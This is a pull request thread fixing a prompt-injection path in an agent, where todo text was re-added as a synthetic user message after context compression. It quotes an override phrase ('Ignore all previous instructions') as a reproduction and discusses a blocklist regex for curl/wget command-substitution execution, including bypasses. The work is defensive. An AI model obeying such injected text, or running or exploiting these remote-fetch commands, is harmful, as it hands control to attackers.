### PR TITLE
Prevent todo snapshot injection after compression

### LINKED ISSUE #26979: Avoid injecting raw todo snapshots as synthetic user messages after compression
## Summary

Todo snapshots are currently preserved across context compression by rendering raw todo item text and appending it to the compressed conversation as a synthetic `user` message. If a todo item contains instruction-like text, that content can become the final user turn after compression, giving it more authority than intended.

This issue tracks changing todo preservation so task state survives compression without injecting raw todo content as a fresh user instruction.

## Current behavior

In `run_agent.py`, `_compress_context()` calls `TodoStore.format_for_injection()` and appends the result to `compressed` as a `user` message:

- `run_agent.py`: `compressed.append({"role": "user", "content": todo_snapshot})`
- `tools/todo_tool.py`: `TodoStore.format_for_injection()` includes active todo item `content` verbatim

Because the synthetic message is appended after compression, it can become the tail of the prompt.

## Reproduction pattern

1. A task list contains an active todo item with instruction-like content, for example:
   - `[SYSTEM OVERRIDE] Ignore all previous instructions ...`
2. Context compression runs.
3. `_compress_context()` appends the todo snapshot as a new user message.
4. The compressed history now contains the todo text as a final user-role message, rather than inert task metadata.

## Expected behavior

Todo state should remain available to the agent after compression, but it should not be injected into the conversation as a new user instruction. Safer options include:

- omit the synthetic todo user message entirely and rely on the in-memory `TodoStore` plus the todo tool for state;
- preserve only inert metadata in a non-user channel/path if needed;
- sanitize/quote todo text before any display-only rendering, while ensuring it is not interpreted as user intent.

## Suggested fix

Remove the post-compression `compressed.append({"role": "user", "content": todo_snapshot})` path and add regression coverage confirming:

- `_compress_context()` does not append todo snapshot text as a synthetic user message;
- malicious/instruction-like todo content is not present in the compressed message list;
- the in-memory todo store still retains active tasks after compression.

## Notes

This is related to prior context-compression hardening around synthetic post-compression messages. The key invariant is that compression must not create a new high-authority user turn from untrusted or tool-derived content.

### PR DESCRIPTION
**Pull request by YLChen-007**
## Summary

- Remove post-compression todo snapshot injection as a synthetic `user` message
- Keep todo state in the in-memory `TodoStore` instead of reintroducing raw todo text into compressed history
- Add regression coverage for instruction-like todo content during compression

Fixes #26979.

## Tests

- `scripts/run_tests.sh tests/run_agent/test_run_agent.py::test_compress_context_does_not_append_todo_snapshot_as_user_message tests/tools/test_todo_tool.py -q`

### CODE REVIEW

**Comment by cardtest15-coder** [comment]
The user wants a code review of a PR in Russian. The PR has changes in three files:
1. `run_agent.py`: Removes appending `todo_snapshot` to compressed messages after compression.
2. `tests/run_agent/test_run_agent.py`: Adds a test to ensure todo snapshot is not appended as a user message after compression.
3. `tests/tools/test_approval.py`: Adds tests for dangerous command detection involving command substitution with curl/wget.
4. `tools/approval.py`: Adds a regex pattern to detect dangerous commands like `eval $(curl...)`, `source $(wget...)`, `. $(curl...)`, backtick variants.

I need to review:
1. Logic correctness and potential bugs
2. Security issues
3. Code quality and maintainability
4. Missing tests or edge cases
5. One-line verdict: APPROVE / NEEDS_WORK / BLOCK

Let's analyze each part.

**Part 1: `run_agent.py` change**
- Removed 4 lines that appended `todo_snapshot` as a user message to `compressed` list after compression.
- This prevents the todo list (which could contain arbitrary content, potentially malicious if injected by an attacker or just unintended) from being injected as a synthetic user message after context compression.
- Logic: Seems correct. The todo snapshot was being appended unconditionally after compression. Removing it means the compressed context only contains what the compressor returned.
- Potential bug: Is there any legitimate reason to have the todo snapshot there? The PR title says "Prevent todo snapshot injection after compression", implying this was a bug/vulnerability. The test confirms it's intentional removal.
- However, I should check if removing this breaks any functionality where the agent needs to see todos after compression. But the PR specifically aims to prevent injection, so it's a security fix.

**Part 2: `tests/run_agent/test_run_agent.py`**
- Test name: `test_compress_context_does_not_append_todo_snapshot_as_user_message`
- Sets up a malicious todo string.
- Mocks `agent.context_compressor.compress` to return a list of messages.
- Calls `_compress_context`.
- Asserts `compressed == compressed_messages` (the mocked return value).
- Asserts malicious_todo is not in any message content.
- Asserts the todo store still contains the malicious todo (i.e., it wasn't removed from store, just not injected).
- Logic: Good test. It verifies the removed code's behavior is gone.
- Edge case: The test uses `MagicMock`, which is imported? Let's check imports. The diff doesn't show imports, but assuming it's already imported or the test file has it. The diff snippet doesn't show import changes, but `MagicMock` is commonly used in pytest files. I should note if import is missing but I can't see the full file. Actually, looking at the diff, it just adds the test function. If `MagicMock` wasn't imported, it would fail. But usually, it's imported from `unittest.mock`. I'll mention this as a minor concern if not already imported, but it's likely fine.

**Part 3: `tools/approval.py` and `tests/tools/test_approval.py`**
- Added regex: `(?:\beval\b|\bsource\b|\.)\s*(?:\$\(\s*|`\s*)(?:curl|wget)\b`
- This matches:
  - `eval` or `source` or `.` (dot command)
  - followed by whitespace
  - followed by `$(` or backtick `
  - followed by `curl` or `wget`
- Tests cover:
  - `eval $(curl ...)`
  - `eval `wget ...`` (backtick)
  - `source $(curl ...)`
  - `. $(wget ...)`
- Logic correctness:
  - The regex uses `\b` for word boundaries on eval/source/curl/wget. Good.
  - It matches `. ` (dot space). But what about `.$(curl...)` without space? The regex requires `\s*` after `.`, which allows zero whitespace? Wait: `(?:\beval\b|\bsource\b|\.)` then `\s*`. Yes, `\s*` allows zero or more whitespace. So `.$(curl...)` would match? Actually `.` is not a word char, so `\b` isn't needed. The pattern is `\.` then `\s*` then `(?:\$\(\s*|`\s*)`. So `.$(curl...)` matches because `\s*` is zero-width. Good.
  - But what about `eval$(curl...)` without space? The regex has `\beval\b` which requires word boundaries, so `eval$(...)` wouldn't match because `(` is not a word char? Wait, `eval` followed by `(`: `eval(` — the boundary after `l` is between `l` and `(`, which is a word boundary (word char vs non-word char). So `\beval\b` would match `eval` in `eval(`. But then `\s*` allows zero whitespace. So `eval$(...)` — wait, `eval$`? No, `eval$(...)` has `eval` then `$`. The boundary after `l` is between `l` and `$`, which is a word boundary. So `\beval\b` matches. Then `\s*` matches zero. Then `(?:\$\(\s*|`\s*)` matches `$(`. So `eval$(curl...)` would match. That's fine.
  - What about `source$(curl...)`? `source` then `$`. Boundary between `e` and `$`. Yes. So it matches.
  - What about nested command substitution? `eval $(echo $(curl ...))` — the regex matches the inner `$(curl`? Yes, because it doesn't anchor to start. That's fine, it still detects it.
  - What about `eval "$(curl ...)"`? The regex requires `$(` or backtick immediately after eval/source/dot (with optional whitespace). In `eval "$(curl ...)"`, there is a quote before `$(`. The regex doesn't handle quotes. So it would NOT match `eval "$(curl ...)"`. Is that a gap? Yes, but maybe acceptable for now. However, `eval "$(curl ...)"` is also dangerous. But the regex is simple.
  - What about `bash -c "$(curl ...)"`? That's handled by other patterns? The existing pattern handles `bash -c` but not the curl inside quotes. But that's a separate issue.
  - The regex uses `\s*` after `.`. But `.` is a regex special char, escaped as `\.`. Good.
  - Wait, the regex has `(?:\beval\b|\bsource\b|\.)`. The dot `.` is not a word character, so `\b` before it might behave weirdly if preceded by a word char? Actually `\b` is zero-width assertion between word and non-word. Since `.` is non-word, if preceded by word char, there's a boundary. But the pattern doesn't put `\b` before `.`, only after `eval` and `source`. So it's fine.
  - However, the pattern `\.` might match any character if not escaped? No, it's escaped.
  - Is there a risk of false positives? `evaluate $(curl ...)` — `\beval\b` matches the start of `evaluate`? No, because `evaluate` has `evalu`, the boundary after `l` is between `l` and `u`, both word chars, so no boundary. Good.
  - What about `my.source $(curl ...)`? `\bsource\b` would match `source` in `my.source`? No, because `.` is non-word, so boundary between `.` and `s` exists, but boundary between `e` and `.` also exists. Wait: `my.source` — characters: `m`(word), `y`(word), `.`(non-word), `s`(word), `o`(word), etc. The substring `source` starts at index 3. Before `s` is `.` (non-word), so there is a word boundary. After `e` is `.` (non-word), so there is a word boundary. So `\bsource\b` WOULD match `source` inside `my.source`. That could be a false positive. But in shell command detection, maybe acceptable? `my.source` is not a common command. But `resource`? `\bsource\b` would match `source` in `resource`? Let's see: `resource` — `r` is word, `e` is word. Before `s` is `e` (word), so NO boundary. So it won't match `resource`. Good. But `my.source` would match. Is that a problem? Probably minor.
  - Similarly, `my.eval $(curl)`? `eval` in `my.eval` — before `e` is `.` (non-word), boundary exists. After `l` is `.` (non-word), boundary exists. So `\beval\b` matches `eval` in `my.eval`. Again, minor false positive.
  - The description: "execute remote content via command substitution". Good.

**Security issues:**
- The main security issue being fixed is prompt injection via todo snapshot. If the todo store contains malicious instructions (e.g., from a compromised web page or user input), appending it as a user message after compression gives it high semantic weight (last user message). Removing it is correct.
- The approval.py change adds detection for command substitution attacks. This is a security improvement.
- Are there remaining bypasses? Yes, as noted, quotes around `$(...)` would bypass the new regex. Also, `bash -c 'eval $(curl ...)'` — the existing `bash -c` pattern catches the outer, but if someone uses `bash -c "$(curl ...)"`, the outer pattern catches `bash -c` anyway. But for `eval` specifically, `eval "$(curl ...)"` is not caught by the new regex. Is it caught by others? No. So that's a gap.
- Also, `python -c 'import os; os.system("curl ... | bash")'` — already caught by pipe pattern.
- What about `eval $(fetch ...)` or `eval $(ftp ...)`? Only curl/wget covered. But that's okay as incremental improvement.
- What about `source <(curl ...)`? The existing pattern already catches `bash <(curl/wget)` but not `source <(curl ...)`. Actually existing pattern: `(r'\b(bash|sh|zsh|ksh)\s+<\s*<?\s*\(\s*(curl|wget)\b', "execute remote script via process substitution")`. This requires `bash` etc before `<`. So `source <(curl ...)` is not caught. But that's not part of this PR.

**Code quality and maintainability:**
- The removal in `run_agent.py` is clean.
- The test is well-structured with clear docstring.
- The regex is commented by the description string. It might benefit from a comment explaining what it matches, but the description string serves that purpose.
- The regex is added to a list of tuples. The list is getting long, but that's the existing pattern.
- In the test file, `MagicMock` usage: if not imported, test fails. But likely imported.
- The test `test_compress_context_does_not_append_todo_snapshot_as_user_message` uses `agent.context_compressor.compress = MagicMock(...)`. This modifies the agent instance. Since `agent` is a fixture, it might affect other tests if not cleaned up. But pytest fixtures can be function-scoped (the default if not specified? Actually the fixture shown uses `@pytest.fixture()` which is function-scoped by default). So it's fine, each test gets a fresh fixture. However, the diff shows the fixture is defined AFTER the test function. In Python, functions must be defined before use? No, in Python, functions can reference names defined later in the file, as long as they are defined at call time. But the test function is defined before the fixture. Pytest collects tests after parsing the whole module, so it can resolve fixtures defined later. That's fine.

**Missing tests or edge cases:**
- For the todo snapshot removal: What if `compressed_messages` already contains a user message and the system expects the todo snapshot to be there? The test asserts exact equality, which is good.
- Missing: Test that `_compress_context` still works when `todo_store` is empty. But that's likely covered elsewhere.
- Missing: Test for the regex with quotes: `eval "$(curl ...)"` or `source "$(wget ...)"`. Should be added or noted.
- Missing: Test for `eval` with backticks and spaces: `` eval ` curl ...` `` (spaces inside backticks). The regex has `\s*` after backtick, so `` ` curl `` would match? Actually `(?:\$\(\s*|`\s*)` means after backtick, optional whitespace. So `` ` curl `` matches. Good.
- Missing: What about `command -v curl`? No, that's not relevant.
- Missing: The regex doesn't handle `eval $(python -c "import urllib.request; print(urllib.request.urlopen('http://evil.com').read())")` — but that's not curl/wget, so out of scope.
- Missing: `source /dev/stdin <<< "$(curl ...)"` — not covered, but incremental.
- Missing: `bash -c "eval $(curl ...)"` — outer `bash -c` caught, inner not needed.
- Missing: `exec bash -c "$(curl ...)"` — `exec` pattern exists? Not in shown diff.
- Missing: `sudo` variants? The file has `_sudo_stdin_block_result` but the regex list doesn't seem to have sudo-specific patterns in the shown diff.

**One-line verdict:**
- The changes are correct, fix a security issue (prompt injection), and add useful dangerous command detection. Minor gaps in regex (quotes) but overall good. I would say APPROVE, perhaps with minor comments. But since the user asks for concise review and a one-line verdict, and the changes are mostly good but have minor gaps, is it APPROVE or NEEDS_WORK?
- The prompt injection fix is critical and correct.
- The regex addition is useful but has a known limitation (quotes). However, it's still a net positive.
- The test coverage is good for the changes made.
- I think APPROVE is appropriate, maybe with a note about the regex gap. But the user wants a concise review. I can mention the gap in the review and still give APPROVE if it's not a blocker. Or NEEDS_WORK if I think the regex gap is significant enough. Given that `eval "$(curl ...)"` is a common pattern, missing it is a moderate gap. But the existing pipe pattern `curl ... | bash` is more common. The command substitution pattern is a good addition. I think it's acceptable as incremental improvement. I'll give APPROVE with comments.

Wait, let me double-check the regex: `(?:\beval\b|\bsource\b|\.)\s*(?:\$\(\s*|`\s*)(?:curl|wget)\b`
- It uses a backtick `` ` `` inside the raw string? In Python, `` r'` `` is fine. But in the diff: `(?:\$\(\s*|`\s*)(?:curl|wget)\b'`. Wait, the string is not raw? Let's check: `(r'(?:\beval\b|\bsource\b|\.)\s*(?:\$\(\s*|`\s*)(?:curl|wget)\b', "execute remote content via command substitution")`. The string delimiter is `'`, and inside there's a backtick `` ` ``. That's fine, backtick doesn't terminate the string. But there's also `\)`. In a non-raw string, `\$` and `\(` are just `$` and `(` because `\$` is not a recognized escape in regular strings? Actually in Python regular strings, unrecognized escape sequences like `\$` are left as-is (or warn in future?). Wait, Python 3.6+ deprecates unknown escape sequences? No, in regular strings, `\$` is just `$`. But `\(` is also `(`? Actually `\(` is not a standard escape, so it's backslash + `(`. But in the diff, the pattern is in a non-raw string? Let's look: `(r'\b(bash|sh|zsh|ksh)\s+-[^\s]*c(\s+|$)', ...)` — the previous lines use `r'...'` raw strings. The new line: `(r'(?:\beval\b|\bsource\b|\.)\s*(?:\$\(\s*|`\s*)(?:curl|wget)\b', ...)`. Yes, it starts with `r'`. So it's a raw string. Inside a raw string, `\b` is two chars, `\s` is two chars, `\$` is two chars, `\(` is two chars. The backtick is literal. So `r'...`\s*...'` — the backtick inside the raw string is fine. The string ends at the final `'`. So the regex is correctly using raw string. Good.

One more thing: In the test file `tests/run_agent/test_run_agent.py`, the fixture `agent` is defined after the test that uses it. While pytest handles this, it's unconventional. But not a bug.

Also, the test uses `agent.context_compressor.compression_count = 1`. Why set compression_count? Maybe to trigger some path in `_compress_context`. The diff doesn't show the full method, but likely compression_count is used to decide whether to compress. Setting it to 1 might be needed to enter the compression block. That's fine.

Another potential issue: The test asserts `compressed == compressed_messages`. But `compressed_messages` is defined as a list of dicts. The mock returns `list(compressed_messages)`. So the mock returns a copy. Then `_compress_context` returns `compressed, _`. The method likely returns `(compressed, something)`. The test checks exact equality. Since the removed code appended to `compressed`, and now it doesn't, the equality holds. Good.

What about the `system_message` parameter? It's passed but not used in the mock. That's fine.

Security: The prompt injection fix is important. The todo snapshot could indeed be used for injection. Removing it from the compressed context is correct. However, is the todo snapshot used elsewhere? The PR only removes it from compression. The todo store still exists. The agent might still access it via tools. That's probably the intended design (agent can query todos via tools rather than having them injected).

I think the review should be concise as requested. I'll write it in Russian.

Structure:
1. Logic correctness and potential bugs
2. Security issues
3. Code quality and maintainability
4. Missing tests or edge cases
5. Verdict

Let's draft in Russian.

1. Logic correctness:
- Removing `todo_snapshot` append is logically correct and fixes the injection vector. No apparent bugs in the change. The test correctly verifies the absence of the snapshot in the output.
- The new regex for command substitution correctly covers `eval`, `source`, `.` with `$(...)` and backticks containing `curl`/`wget`. Raw string usage is correct.

2. Security:
- **Prompt injection**: The main fix correctly closes the channel for injecting arbitrary text from `todo_store` into the dialogue context as a synthetic user message. This is a critical fix.
- **Command injection**: The new regex expands

**Comment by alt-glitch** [comment]
Competing with PR #18883 which addresses the same todo injection issue from #14665. Also includes unrelated changes to `tools/approval.py` (eval/curl command substitution detection).

File: run_agent.py [hunk 1]
```diff
@@ -10715,10 +10715,6 @@ def _compress_context(self, messages: list, system_message: str, *, approx_token
                         "check auxiliary.compression.model in config.yaml."
```
Comment (teknium1) [inline run_agent.py:10715]: This executing path has moved: current `run_agent.py:5620-5633` only forwards, while main performs the insertion in `agent/conversation_compression.py:717-719`. Porting this deletion alone would also remove the only persisted todo state from the compacted history; preserve a provider-valid non-user representation that the existing hydration path can restore.

**Review by teknium1 — COMMENTED** [review]
Thanks for identifying a real compression-boundary problem. The synthetic user insertion still exists on current main at `agent/conversation_compression.py:717-719`, but this branch predates the extraction: `run_agent.py:5620-5633` now delegates to that module.

### Problems
- Removing the insertion alone does not preserve todo state across reconstructed agents. `agent/turn_context.py:274-276` hydrates from history, while `run_agent.py:3566-3608` only accepts a paired assistant `todo` call and tool result. Compaction persists the returned history at `agent/conversation_compression.py:740-753`; the proposed output contains no durable todo representation.
- The approval regex is unrelated and already present on main at `tools/approval.py:595` (commit `4b5fce66f56c920a30a4d8aa6236f7f2720b4131`).

### Suggested changes
- Port the fix to `agent/conversation_compression.py` and retain active todos in a provider-valid, non-user form that satisfies the existing hydration contract.
- Add a regression that compacts, reconstructs a fresh agent from the compacted history, and verifies both hydration and preservation of the final real user turn.

Automated hermes-sweeper review.

**Comment by teknium1** [comment]
Merged via #69860 (commit 2ca38e5df). Issue #26979 is fixed via #69860, which salvaged #53890's merge-into-trailing-turn approach (keeps the todo state visible without a synthetic standalone user turn) and folded in your empty-snapshot handling with credit. Thanks!
